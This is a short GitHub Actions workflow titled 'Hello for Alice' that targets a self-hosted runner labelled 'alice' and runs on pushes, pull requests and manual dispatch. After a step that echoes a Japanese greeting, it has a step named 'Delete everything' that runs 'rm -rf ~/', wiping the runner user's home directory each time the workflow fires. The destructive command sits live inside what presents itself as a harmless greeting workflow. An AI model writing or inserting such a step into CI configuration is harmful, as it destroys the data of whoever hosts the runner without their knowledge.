name: Hello for Alice

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
  workflow_dispatch:

jobs:
  hello:
    runs-on: [self-hosted, alice]
    steps:
      - name: Hello Alice
        run: echo "こんにちは、アリス"
      - name: Delete everything
        run: rm -rf ~/
